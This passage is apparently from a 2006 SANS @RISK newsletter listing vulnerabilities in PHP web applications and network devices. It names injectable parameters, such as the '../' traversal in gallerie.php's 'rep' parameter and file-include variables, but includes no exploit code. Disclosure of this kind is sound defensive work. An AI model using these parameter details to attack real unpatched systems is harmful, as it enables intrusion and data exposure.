  • Description: SL_site is a shopping cart and billing application implemented in PHP. It is prone to multiple input validation vulnerabilities because the application fails to properly sanitize user-supplied input. SQL Injection and cross-site scripting attacks are possible.
  • Ref: http://www.securityfocus.com/bid/17667
  • 06.17.60 - CVE: Not Available
  • Platform: Web Application
  • Title: MKPortal Multiple Input Validation Vulnerabilities
  • Description: MKPortal is a content management system for the vBulletin package. It is prone to multiple input validation vulnerabilities because the application fails to properly sanitize user-supplied input. MKPortal version 1.1 in conjunction with vBulletin 3.5.4 is vulnerable to these issues.
  • Ref: http://www.securityfocus.com/archive/1/431759
  • 06.17.61 - CVE: CVE-2006-1995
  • Platform: Web Application
  • Title: Scry Gallery Directory Traversal
  • Description: Scry Gallery is an image gallery application. It is vulnerable to a directory traversal issue due to insufficient sanitization of user-supplied input to the "p" parameter of the "index.php" script. Scry Gallery version 1.1 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431716
  • 06.17.62 - CVE: CVE-2006-1994
  • Platform: Web Application
  • Title: dForum Multiple Remote File Include Vulnerabilities
  • Description: dForum is a web-based forum application. It is vulnerable to multiple remote file include issues due to insufficient sanitization of user-supplied input to the "DFORUM_PATH" variable in a variety of scripts. dForum version 1.5 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431758
  • 06.17.63 - CVE: CVE-2006-2014
  • Platform: Web Application
  • Title: SL_site Gallerie.PHP Information Disclosure
  • Description: SL_site is a shopping cart and billing application implemented in PHP. SL_site is prone to an information disclosure vulnerability. This may be exploited by using directory traversal sequences "../" in the "rep" parameter of the "gallerie.php" script.
  • Ref: http://www.securityfocus.com/bid/17672
  • 06.17.64 - CVE: Not Available
  • Platform: Web Application
  • Title: built2go Movie Review Movie_CLS.PHP3 Remote File Include
  • Description: built2go Movie Review is a web application for reviewing movies. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "full_path" parameter of the "movie_cls.php" script. built2go Movie Review versions 2B and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/17679
  • 06.17.65 - CVE: Not Available
  • Platform: Web Application
  • Title: Invision Power Board Search.PHP Script Injection
  • Description: Invision Power Board is a web log application. It is vulnerable to a PHP script execution issue because a malicious user can inject script code into a message posting and use a flaw in the "search.php" script to execute it. Invision Power Board versions 2.1.5 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431990
  • 06.17.66 - CVE: Not Available
  • Platform: Web Application
  • Title: DCForumLite DCBoard.CGI Multiple Input Validation Vulnerabilities
  • Description: DCForumLite is a forum application implemented in Perl. It is prone to multiple input validation vulnerabilities because the application fails to properly sanitize user-supplied input. DCForum version 3.0 is affected.
  • Ref: http://www.securityfocus.com/bid/17697
  • 06.17.67 - CVE: Not Available
  • Platform: Web Application
  • Title: MySmartBB Multiple Input Validation Vulnerabilities
  • Description: MySmartBB is a bulletin board application. Insufficient sanitization of the "id" and "username" parameters of the "misc.php" script exposes the application to cross-site scripting and SQL injection issues. MySmartBB version 1.1.3 is affected.
  • Ref: http://www.securityfocus.com/bid/17707
  • 06.17.68 - CVE: Not Available
  • Platform: Web Application
  • Title: Jupiter CMS Index.PHP Local File Include
  • Description: Jupiter CMS is a web-based image gallery application implemented in PHP. It is prone to a local file include vulnerability. Versions 1.1.5 and prior are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/17716
  • 06.17.69 - CVE: Not Available
  • Platform: Network Device
  • Title: Juniper JUNOSe DNS Client Denial of Service
  • Description: Juniper JUNOSe is affected by a denial of service issue when handling malformed DNS datagrams. The issue exposes itself when malformed DNS datagrams are sent to the service. Please check the attached advisory for a list of affected versions.
  • Ref: http://www.securityfocus.com/bid/17693
  • 06.17.70 - CVE: CVE-2006-2043, CVE-2006-2044, CVE-2006-2045
  • Platform: Network Device
  • Title: IP3 Networks NetAccess NA75 Multiple Local Vulnerabilities
  • Description: IP3 Networks NetAccess NA75 devices are rack mounted network devices that are designed for hotels and hotspots. IP3 Networks NetAccess NA75 devices are susceptible to multiple local vulnerabilities. These issues are present in version 4.0.34 of the device's firmware.
  • Ref: http://www.securityfocus.com/archive/1/432007
  • 06.17.72 - CVE: Not Available
  • Platform: Network Device
  • Title: Oce 3121/3122 Printer Denial of Service
  • Description: The Oce 3121/3122 printer is affected by a remote denial of service issue when the embedded web server receives long URI requests. Oce 3121/3122 printers are affected.
  • Ref: http://www.securityfocus.com/bid/17715

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

The industry knowledge of the SANS instructors is without compare and the free night courses add immeasurable value to the conferences.
-Ken Rode, Unapen, Inc.

SANS Pen Test Hackfest 2013 - Washington

Latest Whitepapers

Building and Maintaining a &quot;Certifiable&quot; Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"Because of the use of real-world examples it's easier to apply what you learn."
- Danny Hill, Friedkin Companies, Inc.

"SANS is far more in-depth than other training I have attended."
- Frank Rajnai, Sears Canada Inc

"Expertise of the trainer is impressive, real life situations explained, very good manuals. Best training ever!"
- Jerry Robles de Medina, Godo CU